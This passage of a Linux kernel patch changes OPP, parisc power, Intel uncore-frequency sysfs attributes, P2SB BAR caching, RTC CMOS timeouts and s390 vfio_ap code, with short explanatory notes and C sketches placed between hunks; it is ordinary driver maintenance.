+@@ -1226,12 +1226,12 @@ int dev_pm_opp_set_rate(struct device *dev, unsigned long target_freq)
+ 		 * value of the frequency. In such a case, do not abort but
+ 		 * configure the hardware to the desired frequency forcefully.
+ 		 */
+-		forced = opp_table->rate_clk_single != target_freq;
++		forced = opp_table->rate_clk_single != freq;
+ 	}
+ 
+-	ret = _set_opp(dev, opp_table, opp, &target_freq, forced);
++	ret = _set_opp(dev, opp_table, opp, &freq, forced);
+ 
+-	if (target_freq)
++	if (freq)
+ 		dev_pm_opp_put(opp);
+ 
+ put_opp_table:
+diff --git a/drivers/parisc/power.c b/drivers/parisc/power.c
+index 332bcc0053a5e..498bae2e3403c 100644
+--- a/drivers/parisc/power.c
++++ b/drivers/parisc/power.c
+@@ -238,7 +238,7 @@ static int __init power_init(void)
+ 	if (running_on_qemu && soft_power_reg)
+ 		register_sys_off_handler(SYS_OFF_MODE_POWER_OFF, SYS_OFF_PRIO_DEFAULT,
+ 					qemu_power_off, (void *)soft_power_reg);
+-	else
++	if (!running_on_qemu || soft_power_reg)
+ 		power_task = kthread_run(kpowerswd, (void*)soft_power_reg,
+ 					KTHREAD_NAME);
+ 	if (IS_ERR(power_task)) {
+diff --git a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
+index 9b12fe8e95c91..dd2e654daf4b1 100644
+--- a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
++++ b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.c
+@@ -74,30 +74,30 @@ static ssize_t show_perf_status_freq_khz(struct uncore_data *data, char *buf)
+ }
+ 
+ #define store_uncore_min_max(name, min_max)				\
+-	static ssize_t store_##name(struct device *dev,		\
+-				     struct device_attribute *attr,	\
++	static ssize_t store_##name(struct kobject *kobj,		\
++				     struct kobj_attribute *attr,	\
+ 				     const char *buf, size_t count)	\
+ 	{								\
+-		struct uncore_data *data = container_of(attr, struct uncore_data, name##_dev_attr);\
++		struct uncore_data *data = container_of(attr, struct uncore_data, name##_kobj_attr);\
+ 									\
+ 		return store_min_max_freq_khz(data, buf, count,	\
+ 					      min_max);		\
+ 	}
+ 
+ #define show_uncore_min_max(name, min_max)				\
+-	static ssize_t show_##name(struct device *dev,		\
+-				    struct device_attribute *attr, char *buf)\
++	static ssize_t show_##name(struct kobject *kobj,		\
++				    struct kobj_attribute *attr, char *buf)\
+ 	{                                                               \
+-		struct uncore_data *data = container_of(attr, struct uncore_data, name##_dev_attr);\
++		struct uncore_data *data = container_of(attr, struct uncore_data, name##_kobj_attr);\
+ 									\
+ 		return show_min_max_freq_khz(data, buf, min_max);	\
+ 	}
+ 
+ #define show_uncore_perf_status(name)					\
+-	static ssize_t show_##name(struct device *dev,		\
+-				   struct device_attribute *attr, char *buf)\
++	static ssize_t show_##name(struct kobject *kobj,		\
++				   struct kobj_attribute *attr, char *buf)\
+ 	{                                                               \
+-		struct uncore_data *data = container_of(attr, struct uncore_data, name##_dev_attr);\
++		struct uncore_data *data = container_of(attr, struct uncore_data, name##_kobj_attr);\
+ 									\
+ 		return show_perf_status_freq_khz(data, buf); \
+ 	}
+@@ -111,11 +111,11 @@ show_uncore_min_max(max_freq_khz, 1);
+ show_uncore_perf_status(current_freq_khz);
+ 
+ #define show_uncore_data(member_name)					\
+-	static ssize_t show_##member_name(struct device *dev,	\
+-					   struct device_attribute *attr, char *buf)\
++	static ssize_t show_##member_name(struct kobject *kobj,	\
++					   struct kobj_attribute *attr, char *buf)\
+ 	{                                                               \
+ 		struct uncore_data *data = container_of(attr, struct uncore_data,\
+-							  member_name##_dev_attr);\
++							  member_name##_kobj_attr);\
+ 									\
+ 		return sysfs_emit(buf, "%u\n",				\
+ 				 data->member_name);			\
+@@ -126,29 +126,29 @@ show_uncore_data(initial_max_freq_khz);
+ 
+ #define init_attribute_rw(_name)					\
+ 	do {								\
+-		sysfs_attr_init(&data->_name##_dev_attr.attr);	\
+-		data->_name##_dev_attr.show = show_##_name;		\
+-		data->_name##_dev_attr.store = store_##_name;		\
+-		data->_name##_dev_attr.attr.name = #_name;		\
+-		data->_name##_dev_attr.attr.mode = 0644;		\
++		sysfs_attr_init(&data->_name##_kobj_attr.attr);	\
++		data->_name##_kobj_attr.show = show_##_name;		\
++		data->_name##_kobj_attr.store = store_##_name;		\
++		data->_name##_kobj_attr.attr.name = #_name;		\
++		data->_name##_kobj_attr.attr.mode = 0644;		\
+ 	} while (0)
+ 
+ #define init_attribute_ro(_name)					\
+ 	do {								\
+-		sysfs_attr_init(&data->_name##_dev_attr.attr);	\
+-		data->_name##_dev_attr.show = show_##_name;		\
+-		data->_name##_dev_attr.store = NULL;			\
+-		data->_name##_dev_attr.attr.name = #_name;		\
+-		data->_name##_dev_attr.attr.mode = 0444;		\
++		sysfs_attr_init(&data->_name##_kobj_attr.attr);	\
++		data->_name##_kobj_attr.show = show_##_name;		\
++		data->_name##_kobj_attr.store = NULL;			\
++		data->_name##_kobj_attr.attr.name = #_name;		\
++		data->_name##_kobj_attr.attr.mode = 0444;		\
+ 	} while (0)
+ 
+ #define init_attribute_root_ro(_name)					\
+ 	do {								\
+-		sysfs_attr_init(&data->_name##_dev_attr.attr);	\
+-		data->_name##_dev_attr.show = show_##_name;		\
+-		data->_name##_dev_attr.store = NULL;			\
+-		data->_name##_dev_attr.attr.name = #_name;		\
+-		data->_name##_dev_attr.attr.mode = 0400;		\
++		sysfs_attr_init(&data->_name##_kobj_attr.attr);	\
++		data->_name##_kobj_attr.show = show_##_name;		\
++		data->_name##_kobj_attr.store = NULL;			\
++		data->_name##_kobj_attr.attr.name = #_name;		\
++		data->_name##_kobj_attr.attr.mode = 0400;		\
+ 	} while (0)
+ 
+ static int create_attr_group(struct uncore_data *data, char *name)
+@@ -161,14 +161,14 @@ static int create_attr_group(struct uncore_data *data, char *name)
+ 	init_attribute_ro(initial_max_freq_khz);
+ 	init_attribute_root_ro(current_freq_khz);
+ 
+-	data->uncore_attrs[index++] = &data->max_freq_khz_dev_attr.attr;
+-	data->uncore_attrs[index++] = &data->min_freq_khz_dev_attr.attr;
+-	data->uncore_attrs[index++] = &data->initial_min_freq_khz_dev_attr.attr;
+-	data->uncore_attrs[index++] = &data->initial_max_freq_khz_dev_attr.attr;
++	data->uncore_attrs[index++] = &data->max_freq_khz_kobj_attr.attr;
++	data->uncore_attrs[index++] = &data->min_freq_khz_kobj_attr.attr;
++	data->uncore_attrs[index++] = &data->initial_min_freq_khz_kobj_attr.attr;
++	data->uncore_attrs[index++] = &data->initial_max_freq_khz_kobj_attr.attr;
+ 
+ 	ret = uncore_read_freq(data, &freq);
+ 	if (!ret)
+-		data->uncore_attrs[index++] = &data->current_freq_khz_dev_attr.attr;
++		data->uncore_attrs[index++] = &data->current_freq_khz_kobj_attr.attr;
+ 
+ 	data->uncore_attrs[index] = NULL;
+ 
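The rationale for the whole conversion: these files are created on a bare kobject, and sysfs then dispatches reads and writes through kobj_sysfs_ops, which passes a struct kobj_attribute to the callbacks. Declaring them as device_attribute made container_of() compute the wrong enclosing pointer. A minimal sketch of the correct pairing (demo_data and its members are illustrative):

    #include <linux/kobject.h>
    #include <linux/sysfs.h>

    struct demo_data {
    	unsigned int value;
    	struct kobj_attribute value_kobj_attr;	/* embedded attribute */
    };

    /*
     * kobj_sysfs_ops hands the callback the kobj_attribute that was
     * registered, so container_of() recovers the surrounding structure
     * reliably.
     */
    static ssize_t value_show(struct kobject *kobj, struct kobj_attribute *attr,
    			  char *buf)
    {
    	struct demo_data *data =
    		container_of(attr, struct demo_data, value_kobj_attr);

    	return sysfs_emit(buf, "%u\n", data->value);
    }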
+diff --git a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.h b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.h
+index f5dcfa2fb2857..2d9dc3151d6ef 100644
+--- a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.h
++++ b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency-common.h
+@@ -23,11 +23,11 @@
+  * @die_id:		Die id for this instance
+  * @name:		Sysfs entry name for this instance
+  * @uncore_attr_group:	Attribute group storage
+- * @max_freq_khz_dev_attr: Storage for device attribute max_freq_khz
+- * @mix_freq_khz_dev_attr: Storage for device attribute min_freq_khz
+- * @initial_max_freq_khz_dev_attr: Storage for device attribute initial_max_freq_khz
+- * @initial_min_freq_khz_dev_attr: Storage for device attribute initial_min_freq_khz
+- * @current_freq_khz_dev_attr: Storage for device attribute current_freq_khz
++ * @max_freq_khz_kobj_attr: Storage for kobject attribute max_freq_khz
++ * @min_freq_khz_kobj_attr: Storage for kobject attribute min_freq_khz
++ * @initial_max_freq_khz_kobj_attr: Storage for kobject attribute initial_max_freq_khz
++ * @initial_min_freq_khz_kobj_attr: Storage for kobject attribute initial_min_freq_khz
++ * @current_freq_khz_kobj_attr: Storage for kobject attribute current_freq_khz
+  * @uncore_attrs:	Attribute storage for group creation
+  *
+  * This structure is used to encapsulate all data related to uncore sysfs
+@@ -44,11 +44,11 @@ struct uncore_data {
+ 	char name[32];
+ 
+ 	struct attribute_group uncore_attr_group;
+-	struct device_attribute max_freq_khz_dev_attr;
+-	struct device_attribute min_freq_khz_dev_attr;
+-	struct device_attribute initial_max_freq_khz_dev_attr;
+-	struct device_attribute initial_min_freq_khz_dev_attr;
+-	struct device_attribute current_freq_khz_dev_attr;
++	struct kobj_attribute max_freq_khz_kobj_attr;
++	struct kobj_attribute min_freq_khz_kobj_attr;
++	struct kobj_attribute initial_max_freq_khz_kobj_attr;
++	struct kobj_attribute initial_min_freq_khz_kobj_attr;
++	struct kobj_attribute current_freq_khz_kobj_attr;
+ 	struct attribute *uncore_attrs[6];
+ };
+ 
+diff --git a/drivers/platform/x86/p2sb.c b/drivers/platform/x86/p2sb.c
+index 1cf2471d54dde..17cc4b45e0239 100644
+--- a/drivers/platform/x86/p2sb.c
++++ b/drivers/platform/x86/p2sb.c
+@@ -26,6 +26,21 @@ static const struct x86_cpu_id p2sb_cpu_ids[] = {
+ 	{}
+ };
+ 
++/*
++ * Cache BAR0 of P2SB device functions 0 to 7.
++ * TODO: The constant 8 is the number of functions that PCI specification
++ *       defines. Same definitions exist tree-wide. Unify this definition and
++ *       the other definitions then move to include/uapi/linux/pci.h.
++ */
++#define NR_P2SB_RES_CACHE 8
++
++struct p2sb_res_cache {
++	u32 bus_dev_id;
++	struct resource res;
++};
++
++static struct p2sb_res_cache p2sb_resources[NR_P2SB_RES_CACHE];
++
+ static int p2sb_get_devfn(unsigned int *devfn)
+ {
+ 	unsigned int fn = P2SB_DEVFN_DEFAULT;
+@@ -39,8 +54,16 @@ static int p2sb_get_devfn(unsigned int *devfn)
+ 	return 0;
+ }
+ 
++static bool p2sb_valid_resource(struct resource *res)
++{
++	if (res->flags)
++		return true;
++
++	return false;
++}
++
+ /* Copy resource from the first BAR of the device in question */
+-static int p2sb_read_bar0(struct pci_dev *pdev, struct resource *mem)
++static void p2sb_read_bar0(struct pci_dev *pdev, struct resource *mem)
+ {
+ 	struct resource *bar0 = &pdev->resource[0];
+ 
+@@ -56,49 +79,66 @@ static int p2sb_read_bar0(struct pci_dev *pdev, struct resource *mem)
+ 	mem->end = bar0->end;
+ 	mem->flags = bar0->flags;
+ 	mem->desc = bar0->desc;
+-
+-	return 0;
+ }
+ 
+-static int p2sb_scan_and_read(struct pci_bus *bus, unsigned int devfn, struct resource *mem)
++static void p2sb_scan_and_cache_devfn(struct pci_bus *bus, unsigned int devfn)
+ {
++	struct p2sb_res_cache *cache = &p2sb_resources[PCI_FUNC(devfn)];
+ 	struct pci_dev *pdev;
+-	int ret;
+ 
+ 	pdev = pci_scan_single_device(bus, devfn);
+ 	if (!pdev)
+-		return -ENODEV;
++		return;
+ 
+-	ret = p2sb_read_bar0(pdev, mem);
++	p2sb_read_bar0(pdev, &cache->res);
++	cache->bus_dev_id = bus->dev.id;
+ 
+ 	pci_stop_and_remove_bus_device(pdev);
+-	return ret;
+ }
+ 
+-/**
+- * p2sb_bar - Get Primary to Sideband (P2SB) bridge device BAR
+- * @bus: PCI bus to communicate with
+- * @devfn: PCI slot and function to communicate with
+- * @mem: memory resource to be filled in
+- *
+- * The BIOS prevents the P2SB device from being enumerated by the PCI
+- * subsystem, so we need to unhide and hide it back to lookup the BAR.
+- *
+- * if @bus is NULL, the bus 0 in domain 0 will be used.
+- * If @devfn is 0, it will be replaced by devfn of the P2SB device.
+- *
+- * Caller must provide a valid pointer to @mem.
+- *
+- * Locking is handled by pci_rescan_remove_lock mutex.
+- *
+- * Return:
+- * 0 on success or appropriate errno value on error.
+- */
+-int p2sb_bar(struct pci_bus *bus, unsigned int devfn, struct resource *mem)
++static int p2sb_scan_and_cache(struct pci_bus *bus, unsigned int devfn)
++{
++	unsigned int slot, fn;
++
++	if (PCI_FUNC(devfn) == 0) {
++		/*
++		 * When the function number of the P2SB device is zero, scan it and
++		 * other function numbers, and if devices are available, cache
++		 * their BAR0s.
++		 */
++		slot = PCI_SLOT(devfn);
++		for (fn = 0; fn < NR_P2SB_RES_CACHE; fn++)
++			p2sb_scan_and_cache_devfn(bus, PCI_DEVFN(slot, fn));
++	} else {
++		/* Scan the P2SB device and cache its BAR0 */
++		p2sb_scan_and_cache_devfn(bus, devfn);
++	}
++
++	if (!p2sb_valid_resource(&p2sb_resources[PCI_FUNC(devfn)].res))
++		return -ENOENT;
++
++	return 0;
++}
++
++static struct pci_bus *p2sb_get_bus(struct pci_bus *bus)
++{
++	static struct pci_bus *p2sb_bus;
++
++	bus = bus ?: p2sb_bus;
++	if (bus)
++		return bus;
++
++	/* Assume P2SB is on the bus 0 in domain 0 */
++	p2sb_bus = pci_find_bus(0, 0);
++	return p2sb_bus;
++}
++
++static int p2sb_cache_resources(void)
+ {
+-	struct pci_dev *pdev_p2sb;
+ 	unsigned int devfn_p2sb;
+ 	u32 value = P2SBC_HIDE;
++	struct pci_bus *bus;
++	u16 class;
+ 	int ret;
+ 
+ 	/* Get devfn for P2SB device itself */
+@@ -106,8 +146,17 @@ int p2sb_bar(struct pci_bus *bus, unsigned int devfn, struct resource *mem)
+ 	if (ret)
+ 		return ret;
+ 
+-	/* if @bus is NULL, use bus 0 in domain 0 */
+-	bus = bus ?: pci_find_bus(0, 0);
++	bus = p2sb_get_bus(NULL);
++	if (!bus)
++		return -ENODEV;
++
++	/*
++	 * When a device with the same devfn exists and its device class is
++	 * not PCI_CLASS_MEMORY_OTHER, as expected for the P2SB, do not touch it.
++	 */
++	pci_bus_read_config_word(bus, devfn_p2sb, PCI_CLASS_DEVICE, &class);
++	if (!PCI_POSSIBLE_ERROR(class) && class != PCI_CLASS_MEMORY_OTHER)
++		return -ENODEV;
+ 
+ 	/*
+ 	 * Prevent concurrent PCI bus scan from seeing the P2SB device and
+@@ -115,17 +164,16 @@ int p2sb_bar(struct pci_bus *bus, unsigned int devfn, struct resource *mem)
+ 	 */
+ 	pci_lock_rescan_remove();
+ 
+-	/* Unhide the P2SB device, if needed */
++	/*
++	 * The BIOS prevents the P2SB device from being enumerated by the PCI
++	 * subsystem, so we need to unhide and hide it back to lookup the BAR.
++	 * Unhide the P2SB device here, if needed.
++	 */
+ 	pci_bus_read_config_dword(bus, devfn_p2sb, P2SBC, &value);
+ 	if (value & P2SBC_HIDE)
+ 		pci_bus_write_config_dword(bus, devfn_p2sb, P2SBC, 0);
+ 
+-	pdev_p2sb = pci_scan_single_device(bus, devfn_p2sb);
+-	if (devfn)
+-		ret = p2sb_scan_and_read(bus, devfn, mem);
+-	else
+-		ret = p2sb_read_bar0(pdev_p2sb, mem);
+-	pci_stop_and_remove_bus_device(pdev_p2sb);
++	ret = p2sb_scan_and_cache(bus, devfn_p2sb);
+ 
+ 	/* Hide the P2SB device, if it was hidden */
+ 	if (value & P2SBC_HIDE)
+@@ -133,12 +181,62 @@ int p2sb_bar(struct pci_bus *bus, unsigned int devfn, struct resource *mem)
+ 
+ 	pci_unlock_rescan_remove();
+ 
+-	if (ret)
+-		return ret;
++	return ret;
++}
++
++/**
++ * p2sb_bar - Get Primary to Sideband (P2SB) bridge device BAR
++ * @bus: PCI bus to communicate with
++ * @devfn: PCI slot and function to communicate with
++ * @mem: memory resource to be filled in
++ *
++ * If @bus is NULL, the bus 0 in domain 0 will be used.
++ * If @devfn is 0, it will be replaced by devfn of the P2SB device.
++ *
++ * Caller must provide a valid pointer to @mem.
++ *
++ * Return:
++ * 0 on success or appropriate errno value on error.
++ */
++int p2sb_bar(struct pci_bus *bus, unsigned int devfn, struct resource *mem)
++{
++	struct p2sb_res_cache *cache;
++	int ret;
++
++	bus = p2sb_get_bus(bus);
++	if (!bus)
++		return -ENODEV;
++
++	if (!devfn) {
++		ret = p2sb_get_devfn(&devfn);
++		if (ret)
++			return ret;
++	}
+ 
+-	if (mem->flags == 0)
++	cache = &p2sb_resources[PCI_FUNC(devfn)];
++	if (cache->bus_dev_id != bus->dev.id)
+ 		return -ENODEV;
+ 
++	if (!p2sb_valid_resource(&cache->res))
++		return -ENOENT;
++
++	memcpy(mem, &cache->res, sizeof(*mem));
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(p2sb_bar);
++
++static int __init p2sb_fs_init(void)
++{
++	p2sb_cache_resources();
++	return 0;
++}
++
++/*
++ * pci_rescan_remove_lock, which guards access to the unhidden P2SB
++ * devices, cannot be taken from the sysfs PCI bus rescan path without
++ * risking a deadlock. To avoid the deadlock, access the P2SB devices
++ * with the lock held at an early step in kernel initialization and
++ * cache the required resources. This should happen after
++ * subsys_initcall, which initializes the PCI subsystem, and before
++ * device_initcall, which requires the P2SB resources.
++ */
++fs_initcall(p2sb_fs_init);
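Since p2sb_bar() now only copies a resource cached at fs_initcall time, it is safe to call from a device probe path. A hedged usage sketch for a hypothetical consumer (the function name is illustrative):

    #include <linux/ioport.h>
    #include <linux/platform_data/x86/p2sb.h>

    static int demo_get_sideband_bar(struct resource *res)
    {
    	/*
    	 * NULL bus and devfn 0 select bus 0 in domain 0 and the default
    	 * P2SB devfn, per the kernel-doc above. No PCI rescan happens
    	 * here anymore; the call just copies the cached BAR0.
    	 */
    	return p2sb_bar(NULL, 0, res);
    }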
+diff --git a/drivers/rpmsg/virtio_rpmsg_bus.c b/drivers/rpmsg/virtio_rpmsg_bus.c
+index 905ac7910c98f..f1af0f6746150 100644
+--- a/drivers/rpmsg/virtio_rpmsg_bus.c
++++ b/drivers/rpmsg/virtio_rpmsg_bus.c
+@@ -378,6 +378,7 @@ static void virtio_rpmsg_release_device(struct device *dev)
+ 	struct rpmsg_device *rpdev = to_rpmsg_device(dev);
+ 	struct virtio_rpmsg_channel *vch = to_virtio_rpmsg_channel(rpdev);
+ 
++	kfree(rpdev->driver_override);
+ 	kfree(vch);
+ }
+ 
+diff --git a/drivers/rtc/rtc-cmos.c b/drivers/rtc/rtc-cmos.c
+index 00e2ca7374ecf..e0a798923ce0e 100644
+--- a/drivers/rtc/rtc-cmos.c
++++ b/drivers/rtc/rtc-cmos.c
+@@ -231,7 +231,7 @@ static int cmos_read_time(struct device *dev, struct rtc_time *t)
+ 	if (!pm_trace_rtc_valid())
+ 		return -EIO;
+ 
+-	ret = mc146818_get_time(t);
++	ret = mc146818_get_time(t, 1000);
+ 	if (ret < 0) {
+ 		dev_err_ratelimited(dev, "unable to read current time\n");
+ 		return ret;
+@@ -292,7 +292,7 @@ static int cmos_read_alarm(struct device *dev, struct rtc_wkalrm *t)
+ 
+ 	/* This is not only an rtc_op, but is also called directly */
+ 	if (!is_valid_irq(cmos->irq))
+-		return -EIO;
++		return -ETIMEDOUT;
+ 
+ 	/* Basic alarms only support hour, minute, and seconds fields.
+ 	 * Some also support day and month, for alarms up to a year in
+@@ -307,7 +307,7 @@ static int cmos_read_alarm(struct device *dev, struct rtc_wkalrm *t)
+ 	 *
+ 	 * Use the mc146818_avoid_UIP() function to avoid this.
+ 	 */
+-	if (!mc146818_avoid_UIP(cmos_read_alarm_callback, &p))
++	if (!mc146818_avoid_UIP(cmos_read_alarm_callback, 10, &p))
+ 		return -EIO;
+ 
+ 	if (!(p.rtc_control & RTC_DM_BINARY) || RTC_ALWAYS_BCD) {
+@@ -556,8 +556,8 @@ static int cmos_set_alarm(struct device *dev, struct rtc_wkalrm *t)
+ 	 *
+ 	 * Use mc146818_avoid_UIP() to avoid this.
+ 	 */
+-	if (!mc146818_avoid_UIP(cmos_set_alarm_callback, &p))
+-		return -EIO;
++	if (!mc146818_avoid_UIP(cmos_set_alarm_callback, 10, &p))
++		return -ETIMEDOUT;
+ 
+ 	cmos->alarm_expires = rtc_tm_to_time64(&t->time);
+ 
+@@ -818,18 +818,24 @@ static void rtc_wake_off(struct device *dev)
+ }
+ 
+ #ifdef CONFIG_X86
+-/* Enable use_acpi_alarm mode for Intel platforms no earlier than 2015 */
+ static void use_acpi_alarm_quirks(void)
+ {
+-	if (boot_cpu_data.x86_vendor != X86_VENDOR_INTEL)
++	switch (boot_cpu_data.x86_vendor) {
++	case X86_VENDOR_INTEL:
++		if (dmi_get_bios_year() < 2015)
++			return;
++		break;
++	case X86_VENDOR_AMD:
++	case X86_VENDOR_HYGON:
++		if (dmi_get_bios_year() < 2021)
++			return;
++		break;
++	default:
+ 		return;
+-
++	}
+ 	if (!is_hpet_enabled())
+ 		return;
+ 
+-	if (dmi_get_bios_year() < 2015)
+-		return;
+-
+ 	use_acpi_alarm = true;
+ }
+ #else
+diff --git a/drivers/rtc/rtc-mc146818-lib.c b/drivers/rtc/rtc-mc146818-lib.c
+index f1c09f1db044c..651bf3c279c74 100644
+--- a/drivers/rtc/rtc-mc146818-lib.c
++++ b/drivers/rtc/rtc-mc146818-lib.c
+@@ -8,26 +8,31 @@
+ #include <linux/acpi.h>
+ #endif
+ 
++#define UIP_RECHECK_DELAY		100	/* usec */
++#define UIP_RECHECK_DELAY_MS		(USEC_PER_MSEC / UIP_RECHECK_DELAY)
++#define UIP_RECHECK_LOOPS_MS(x)		(x / UIP_RECHECK_DELAY_MS)
++
+ /*
+  * Execute a function while the UIP (Update-in-progress) bit of the RTC is
+- * unset.
++ * unset. The timeout is configurable by the caller in ms.
+  *
+  * Warning: callback may be executed more than once.
+  */
+ bool mc146818_avoid_UIP(void (*callback)(unsigned char seconds, void *param),
++			int timeout,
+ 			void *param)
+ {
+ 	int i;
+ 	unsigned long flags;
+ 	unsigned char seconds;
+ 
+-	for (i = 0; i < 100; i++) {
++	for (i = 0; UIP_RECHECK_LOOPS_MS(i) < timeout; i++) {
+ 		spin_lock_irqsave(&rtc_lock, flags);
+ 
+ 		/*
+ 		 * Check whether there is an update in progress during which the
+ 		 * readout is unspecified. The maximum update time is ~2ms. Poll
+-		 * every 100 usec for completion.
++		 * for completion.
+ 		 *
+ 		 * Store the second value before checking UIP so a long lasting
+ 		 * NMI which happens to hit after the UIP check cannot make
+@@ -37,7 +42,7 @@ bool mc146818_avoid_UIP(void (*callback)(unsigned char seconds, void *param),
+ 
+ 		if (CMOS_READ(RTC_FREQ_SELECT) & RTC_UIP) {
+ 			spin_unlock_irqrestore(&rtc_lock, flags);
+-			udelay(100);
++			udelay(UIP_RECHECK_DELAY);
+ 			continue;
+ 		}
+ 
+@@ -56,7 +61,7 @@ bool mc146818_avoid_UIP(void (*callback)(unsigned char seconds, void *param),
+ 		 */
+ 		if (CMOS_READ(RTC_FREQ_SELECT) & RTC_UIP) {
+ 			spin_unlock_irqrestore(&rtc_lock, flags);
+-			udelay(100);
++			udelay(UIP_RECHECK_DELAY);
+ 			continue;
+ 		}
+ 
+@@ -72,6 +77,10 @@ bool mc146818_avoid_UIP(void (*callback)(unsigned char seconds, void *param),
+ 		}
+ 		spin_unlock_irqrestore(&rtc_lock, flags);
+ 
++		if (UIP_RECHECK_LOOPS_MS(i) >= 100)
++			pr_warn("Reading current time from RTC took around %li ms\n",
++				UIP_RECHECK_LOOPS_MS(i));
++
+ 		return true;
+ 	}
+ 	return false;
+@@ -84,7 +93,7 @@ EXPORT_SYMBOL_GPL(mc146818_avoid_UIP);
+  */
+ bool mc146818_does_rtc_work(void)
+ {
+-	return mc146818_avoid_UIP(NULL, NULL);
++	return mc146818_avoid_UIP(NULL, 1000, NULL);
+ }
+ EXPORT_SYMBOL_GPL(mc146818_does_rtc_work);
+ 
+@@ -130,15 +139,27 @@ static void mc146818_get_time_callback(unsigned char seconds, void *param_in)
+ 	p->ctrl = CMOS_READ(RTC_CONTROL);
+ }
+ 
+-int mc146818_get_time(struct rtc_time *time)
++/**
++ * mc146818_get_time - Get the current time from the RTC
++ * @time: pointer to struct rtc_time to store the current time
++ * @timeout: timeout value in ms
++ *
++ * This function reads the current time from the RTC and stores it in the
++ * provided struct rtc_time. The timeout parameter specifies the maximum
++ * time to wait for the RTC to become ready.
++ *
++ * Return: 0 on success, -ETIMEDOUT if the RTC did not become ready within
++ * the specified timeout, or another error code if an error occurred.
++ */
++int mc146818_get_time(struct rtc_time *time, int timeout)
+ {
+ 	struct mc146818_get_time_callback_param p = {
+ 		.time = time
+ 	};
+ 
+-	if (!mc146818_avoid_UIP(mc146818_get_time_callback, &p)) {
++	if (!mc146818_avoid_UIP(mc146818_get_time_callback, timeout, &p)) {
+ 		memset(time, 0, sizeof(*time));
+-		return -EIO;
++		return -ETIMEDOUT;
+ 	}
+ 
+ 	if (!(p.ctrl & RTC_DM_BINARY) || RTC_ALWAYS_BCD)
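The macro arithmetic deserves a worked example: with a 100 usec poll interval, UIP_RECHECK_DELAY_MS evaluates to 10 polls per millisecond, so UIP_RECHECK_LOOPS_MS(i) converts a loop count back into elapsed milliseconds. A user-space self-check mirroring the macros above (with added parentheses around the argument for macro hygiene):

    #include <assert.h>

    #define USEC_PER_MSEC		1000L
    #define UIP_RECHECK_DELAY	100	/* usec */
    #define UIP_RECHECK_DELAY_MS	(USEC_PER_MSEC / UIP_RECHECK_DELAY)
    #define UIP_RECHECK_LOOPS_MS(x)	((x) / UIP_RECHECK_DELAY_MS)

    int main(void)
    {
    	/*
    	 * A 10 ms timeout permits up to 100 polls of 100 usec each: the
    	 * loop condition is UIP_RECHECK_LOOPS_MS(i) < timeout.
    	 */
    	assert(UIP_RECHECK_DELAY_MS == 10);
    	assert(UIP_RECHECK_LOOPS_MS(100) == 10);
    	return 0;
    }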
+diff --git a/drivers/s390/crypto/vfio_ap_ops.c b/drivers/s390/crypto/vfio_ap_ops.c
+index 934515959ebf4..0659aa2863ab0 100644
+--- a/drivers/s390/crypto/vfio_ap_ops.c
++++ b/drivers/s390/crypto/vfio_ap_ops.c
+@@ -425,6 +425,7 @@ static struct ap_queue_status vfio_ap_irq_enable(struct vfio_ap_queue *q,
+ 		VFIO_AP_DBF_WARN("%s: gisc registration failed: nisc=%d, isc=%d, apqn=%#04x\n",
+ 				 __func__, nisc, isc, q->apqn);
+ 
++		vfio_unpin_pages(&q->matrix_mdev->vdev, nib, 1);
+ 		status.response_code = AP_RESPONSE_INVALID_GISA;
+ 		return status;
+ 	}
+@@ -638,8 +639,7 @@ static bool vfio_ap_mdev_filter_cdoms(struct ap_matrix_mdev *matrix_mdev)
+  * Return: a boolean value indicating whether the KVM guest's APCB was changed
+  *	   by the filtering or not.
+  */
+-static bool vfio_ap_mdev_filter_matrix(unsigned long *apm, unsigned long *aqm,
+-				       struct ap_matrix_mdev *matrix_mdev)
++static bool vfio_ap_mdev_filter_matrix(struct ap_matrix_mdev *matrix_mdev)
+ {
+ 	unsigned long apid, apqi, apqn;
+ 	DECLARE_BITMAP(prev_shadow_apm, AP_DEVICES);
+@@ -660,8 +660,9 @@ static bool vfio_ap_mdev_filter_matrix(unsigned long *apm, unsigned long *aqm,
+ 	bitmap_and(matrix_mdev->shadow_apcb.aqm, matrix_mdev->matrix.aqm,
+ 		   (unsigned long *)matrix_dev->info.aqm, AP_DOMAINS);
+ 
+-	for_each_set_bit_inv(apid, apm, AP_DEVICES) {
+-		for_each_set_bit_inv(apqi, aqm, AP_DOMAINS) {
++	for_each_set_bit_inv(apid, matrix_mdev->shadow_apcb.apm, AP_DEVICES) {
++		for_each_set_bit_inv(apqi, matrix_mdev->shadow_apcb.aqm,
++				     AP_DOMAINS) {
+ 			/*
+ 			 * If the APQN is not bound to the vfio_ap device
+ 			 * driver, then we can't assign it to the guest's
+@@ -930,7 +931,6 @@ static ssize_t assign_adapter_store(struct device *dev,
+ {
+ 	int ret;
+ 	unsigned long apid;
+-	DECLARE_BITMAP(apm_delta, AP_DEVICES);
+ 	struct ap_matrix_mdev *matrix_mdev = dev_get_drvdata(dev);
+ 
+ 	mutex_lock(&ap_perms_mutex);
+@@ -959,11 +959,8 @@ static ssize_t assign_adapter_store(struct device *dev,
+ 	}
+ 
+ 	vfio_ap_mdev_link_adapter(matrix_mdev, apid);
+-	memset(apm_delta, 0, sizeof(apm_delta));
+-	set_bit_inv(apid, apm_delta);
+ 
+-	if (vfio_ap_mdev_filter_matrix(apm_delta,
+-				       matrix_mdev->matrix.aqm, matrix_mdev))
++	if (vfio_ap_mdev_filter_matrix(matrix_mdev))
+ 		vfio_ap_mdev_update_guest_apcb(matrix_mdev);
+ 
+ 	ret = count;
+@@ -1139,7 +1136,6 @@ static ssize_t assign_domain_store(struct device *dev,
+ {
+ 	int ret;
+ 	unsigned long apqi;
+-	DECLARE_BITMAP(aqm_delta, AP_DOMAINS);
+ 	struct ap_matrix_mdev *matrix_mdev = dev_get_drvdata(dev);
+ 
+ 	mutex_lock(&ap_perms_mutex);
+@@ -1168,11 +1164,8 @@ static ssize_t assign_domain_store(struct device *dev,
+ 	}
+ 
+ 	vfio_ap_mdev_link_domain(matrix_mdev, apqi);
+-	memset(aqm_delta, 0, sizeof(aqm_delta));
